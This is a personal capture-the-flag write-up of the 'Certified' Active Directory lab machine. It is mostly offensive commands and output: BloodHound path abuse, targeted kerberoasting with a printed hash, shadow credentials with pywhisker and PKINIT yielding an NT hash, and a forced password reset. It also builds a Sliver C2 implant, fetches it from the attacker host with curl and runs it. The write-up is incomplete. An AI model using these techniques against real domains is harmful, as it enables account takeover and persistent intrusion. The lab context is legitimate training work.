Certified - Writeup - Konstantinovitz

## Summary AD Domain Controller, assumed breach scenario. --- ## External Authenticated Access - `judith.mader` `judith.mader:judith09` - asreproast - kerberoast ### Enumeration #### Remote Services ``` # Nmap 7.93 scan initiated Wed Feb 12 21:27:54 2025 as: nmap -sV -sC --vv -oN remote-services-base.nmap 10.10.11.41 Nmap scan report for 10.10.11.41 Host is up, received echo-reply ttl 127 (0.042s latency). Scanned at 2025-02-12 21:27:54 CET for 97s Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-02-13 03:28:11Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-02-13T03:29:31+00:00; +7h00m01s from scanner time. | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb | Issuer: commonName=certified-DC01-CA/domainComponent=certified | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-05-13T15:49:36 | Not valid after: 2025-05-13T15:49:36 | MD5: 4e1f97f07c0ad0ec52e15f63ec55f3bc | SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828 | -----BEGIN CERTIFICATE----- ... |_-----END CERTIFICATE----- 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb | Issuer: commonName=certified-DC01-CA/domainComponent=certified | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-05-13T15:49:36 | Not valid after: 2025-05-13T15:49:36 | MD5: 4e1f97f07c0ad0ec52e15f63ec55f3bc | SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828 | -----BEGIN CERTIFICATE----- ... |_-----END CERTIFICATE----- |_ssl-date: 2025-02-13T03:29:32+00:00; +7h00m01s from scanner time. 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-02-13T03:29:31+00:00; +7h00m01s from scanner time. | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb | Issuer: commonName=certified-DC01-CA/domainComponent=certified | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-05-13T15:49:36 | Not valid after: 2025-05-13T15:49:36 | MD5: 4e1f97f07c0ad0ec52e15f63ec55f3bc | SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828 | -----BEGIN CERTIFICATE----- ... |_-----END CERTIFICATE----- 3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb | Issuer: commonName=certified-DC01-CA/domainComponent=certified | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-05-13T15:49:36 | Not valid after: 2025-05-13T15:49:36 | MD5: 4e1f97f07c0ad0ec52e15f63ec55f3bc | SHA-1: 28e24c68aa00dd8bee91564b33fea345116b3828 | -----BEGIN CERTIFICATE----- ... |_-----END CERTIFICATE----- |_ssl-date: 2025-02-13T03:29:32+00:00; +7h00m01s from scanner time. Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s | smb2-time: | date: 2025-02-13T03:28:51 |_ start_date: N/A | smb2-security-mode: | 311: |_ Message signing enabled and required ``` #### SMB - no interesting shares - may have a look at [[SMB Share - SYSVOL]] - don't contain anything but GptTmpl.inf files #### winrm - not permitted ### ldap - can get a list of usernames - nxc asreproast yields no love - neither does `GetNPUsers.py -request -dc-ip $RHOST -usersfile users.txt -format hashcat 'certified.htb/judith.mader:judith09'` - password sprayed `user:user` - no love #### Bloodhound ```sh nxc ldap $RHOST -u $USER -p $PASS --bloodhound --collection All --dns-server $RHOST ``` Bloodhound works out and reveals: 1. A kerberoastable user: `management_svc` 2. A feasible attack vector for lateral movement ### Lateral Movement to `management_svc` **Shortest Paths from Owned Objects:** ![[Pasted image 20250213215344.png]] So the attack graph: ``` [email protected] --[WriteOwner]--> [email protected] --[GenericWrite]--> [email protected] ``` We leverage the `WriteOwner` permission to add ourselves (`judith.mader`) to the `management` group. ```sh owneredit.py -action write -new-owner 'judith.mader' -target 'Management' -debug certified.htb/judith.mader:judith09 ``` Next we'll grant ourselves the `AddMember` permission: ```sh dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target 'Management' certified.htb/judith.mader:judith09 ``` Which we'll leverage to add `judith.mader` as a member of `Management`: ```sh net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "10.10.11.41" # verify that we're indeed a part of the group net rpc group members "Management" -U "certified.htb"/"judith.mader"%"judith09" -S "10.10.11.41" # yields # CERTIFIED\judith.mader # CERTIFIED\management_svc # (yaaay) ``` So we just became members of `management` which has the `GenericWrite` permission on the `management_svc` user, which in turn will allow us to perform two types of attacks: - [[Kerberoasting]] - [[AD Shadow Credentials - TODO]] #### Targeted Kerberoast of We'll attempt a targeted kerberoast: ``` ./targetedKerberoast.py -u 'judith.mader' -p 'judith09' --request-user 'management_svc' -d 'certified.htb' [*] Starting kerberoast attacks [*] Attacking user (management_svc) [+] Printing hash for (management_svc) $krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$35051ae0ff38c1f3d80bd87cf772ef2b$796e29a2c819de913f236311281cdaa0fa303bb7fbe5e00ebbe88335fcddcb366e54987b0737ac99e998929d67076a8cc6ded992a6906c08ac0fa3ea532d811d68b46a8d5a6672bc68e00b10432fbe2636342e097737c6fe890d8af9116013d2f0077b233224cb1b56fa8b09047f9f762fd581e75c5a46037aa692141d500e4a1ad188165e7b76bc2444a1f8c257347f81771f0aae05bd80aebe1a27d03e18a82c6e9d6ef6868c6198d56f7c56f362a258e0a107af9c721bad169fb54017218bca8b290dc0ba2ff2aa84b072076ef33fe687078bc09eff9a3d018438b698ff0462899f711ca24b81890fa8ecec621860e5eaa9e5cfad4b1fbbf4e785a43993a6c7fa9dcf145772d0a090bc038ac946b2ea6e453a3bc085c7a4cd7622d19b150adc34a90ac90b04ac46a09f6e8222b7c609912895f1a723101300fa800d23be904d4f1930b49e0bccbd568ce1ff0d7e16c31124d56f0a28ed11ec77fc0074cfcf6bc2b255c86c5195ff8ed766caf803295acda4368ac7c8d8c56de997486beef3504c8265c4e68a51b374151e71d91d126bb07dc36f69590ab2732d24e1e23de48951e4f948d9c68c50c27c4885668a6da49acb9caf0fd3389b83682eb3117f861805e5bf2c501a1a98fd0cfa127751988c5edf88125c2caf502f14b4aaa6a6d4501487122195a161dc9e8c13a4a0b8f8b1aca2907586085443f9e0def2ad5cf4b6c0653e6fb247479ff0aa180c57515dc411684d289627fe8dc5f8b43a6b24c1b181621199e0aff57017090016635054441912ab65a9eebf60fa26435d7e0161dc9954b89ce58db61826b1e966f21a780c4827a789f724590c2a1134b4bdbb10fc849df81841a0d19852e30a256f8fc01f83f5530c8e5cbc52fe983b2e077d57cc982855a605726cf75158cee661ea11f4622af35a0d54f384c7ee7e4569dd7e67741dea11a54b815bf38c62b8d6c7f73db2b9e5dc5ad8592842420858c9cbe2c8b73335c937ba2251cb59782ce7bff5db10ebb81e4b181c80956ea3e4de8126e4724582c35b0bd15a9882b25f99d686a3d9a6d722176d84ca2c6ea800ceb2d5ae5562d771a66646d578ff95a3f3ca091bdde29407d55b0a3e9c7bcba96ac644e8a8cd2d9546ecb207ff63a1ada4d2f6d81eb1be52b98c11094a374d3e16dc90df5cd72577b07ca66500afc6a6ce8c924165cb30b6b81639eecbfdc601dcc3cef8a4a776ae57295a972e609e14118c7ee8936c52adc616ff3618897c7f588e047d8811724119c2f97515447d140b88bccba286e1d467a08647a2914a62e9ea37ec08999fc8a3af3e0b4aad9830704b23584253dab2c94e6f8973ff8125a60511f609bccd0b6897eb6d6dfb1196047b3326b3a4b8cad9a7db696999098cce8ff2543f8b42d223e0658c80dd10dc3f68f3f76dacf2f25f0df5220a0aad932465df8501e8eca05493dee4e22eb42fb514f84d040dfb79dc6e4ed742383e28ab452eb6c89324c64456fd309836bdff53645d876e06e2640d6835c66f1eb7242143e48baa82c4a2988dc8c4467643a2d73887cb3a2d4775ef66e33267 ``` noice, we got a #password-hash, now time for some #cracking : ```sh john --wordlist=/home/noctua/arsenal/wordlists/rockyou.txt management_svc.hash Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS-REP etype 23 [MD4 HMAC-MD5 RC4]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status 0g 0:00:00:05 DONE (2025-02-14 00:33) 0g/s 2512Kp/s 2512Kc/s 2512KC/s !)()45jlr..*7¡Vamos! Session completed. ``` Password dosen't crack.... #### [[AD Shadow Credentials - TODO]] Attack ``` pywhisker -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add" [*] Searching for the target account [*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID: a6b33665-94c7-ed5b-301c-1607ed694797 [*] Updating the msDS-KeyCredentialLink attribute of management_svc [+] Updated the msDS-KeyCredentialLink attribute of the target object [+] Saved PFX (#PKCS12) certificate & key at path: OifEQHse.pfx [*] Must be used with password: YDBvy5KJYyHLdB17qQMo [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools ``` then we'll obtain our TGT (Ticket-Granting Ticket): ``` ╭─[λ]-[~/targets/certified/judith.mader]-[10.10.11.41] ╰─> gettgtpkinit certified.htb/management_svc -cert-pfx OifEQHse.pfx -pfx-pass YDBvy5KJYyHLdB17qQMo -dc-ip 10.10.11.41 management_svc.ccache ... f6a71ad226ec7a900687169824f07ed744d157fc4ed333d88e02762cc8da9f36 ... ``` aaaaand after that I'll exchange the TGT for an NThash: ```sh getnthash -key f6a71ad226ec7a900687169824f07ed744d157fc4ed333d88e02762cc8da9f36 certified.htb/management_svc Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Using TGT from cache [*] Requesting ticket to self with PAC Recovered NT Hash a091c1832bcdd4677c28b5a6a1295584 ``` finally we'll leverage `management_svc` `Remote Management Users` group membership to PSRemote into the target system: ```sh evil-winrm -i $RHOST -u management_svc -H a091c1832bcdd4677c28b5a6a1295584 ``` --- ## Internal Authenticated Access - `management_svc` ``` export USER=management_svc export KRB5CCNAME=management_svc.ccache export HASH=a091c1832bcdd4677c28b5a6a1295584 ``` We're now authenticated as `managment_svc`. Upon re-inspection of our #bloodhound graph we observe that `management_svc` has `GenericAll` permission on `ca_operator` which, if I'm not mistaken, can be the last stepping stone towards reaching Domain admin. ![[Pasted image 20250214175403.png]] Now before I take any further steps, I would like to improve my system foothold by deploying a [[Sliver C2]] agent which comes with a lot of pre-packaged AD tooling: ```sh sliver > generate --os windows --http 10.10.14.7 --skip-symbols [*] Implant saved to /home/noctua/targets/sauna/fsmith/THICK_ENERGY.exe ``` We download it to the target using: ```powershell *Evil-WinRM* PS C:\Users\management_svc\Documents> curl http://10.10.14.7:8000/THICK_ENERGY.exe -o agent.exe .\agent.exe ``` We're now locked and loaded to proceed with further lateral movement and privesc. The `GenericAll` permission leaves us with two attack vectors resulting in account takeover: 1. Force a password change - to a password of our choosing 2. Have another go with the [[AD Shadow Credentials - TODO]] attack. Given that forcing a password change is the lowest hanging fruit I'll give it the first go: ### Forced Password Change ```powershell *Evil-WinRM* PS C:\Users\management_svc\Documents> net user ca_operator password123 /domain The command completed successfully. ``` Let's verify the availability of the new account: ```sh nxc smb $RHOST -u $USER -p $PASS SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False) SMB 10.10.11.41 445 DC01 [+] certified.htb\ca_operator:password123 SMB 10.10.11.41 445 DC01 Node [email protected] successfully set as owned in BloodHound ``` Now the thing, the `ca_operator` dosen't seem to have `CanPSRemote` privilege which is gonna force me to jump through a few more hoops ``` psexec.py certified.htb/ca_operator:[email protected] # no writable shares smbexec.py certified.htb/ca_operator:[email protected] # access denied # local attempt Evil-WinRM* PS C:\Users\management_svc\Documents> .\RunasCs.exe ca_operator password123 "cmd /c whoami /all" --logon-type 3 --domain certified.htb [*] Warning: User profile directory for user ca_operator does not exists. Use --force-profile if you want to force the creation. [*] Warning: The function CreateProcessWithLogonW is not compatible with the requested logon type '3'. Reverting to the Interactive logon type '2'. To force a specific logon type, use the flag combination --remote-impersonation and --logon-type. [-] RunasCsException: Selected logon type '2' is not granted to the user 'ca_operator'. Use available logon type '3'. ``` Got stuck here and decided to finally give up and have a look at a writeup. ```sh # Perform shadow credentials attack?? certipy shadow auto -u [email protected] -hashes $HASH -account ca_operator certipy account update -u [email protected] -hashes $HASH -user ca_operator -upn administrator Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Updating user 'ca_operator': userPrincipalName : administrator [*] Successfully updated 'ca_operator' certipy-ad req -username [email protected] -hashes $HASH -ca certified-DC01-CA -template CertifiedAuthentication ``` --- ## Lessons Learned - Targeted Kerberoasting - How to exploit certain #AD-perm such as `WriteOwner`, `GenericAll` - Got better at working with [[NetExec-TODO]], [[go-windapsearch]], [[BloodHound]] and [[Impacket]] as well as install `pywhisker` and `targetedKerberoast`. - [[AD Shadow Credentials - TODO]] - Account takeover through forced password change --- ## Reference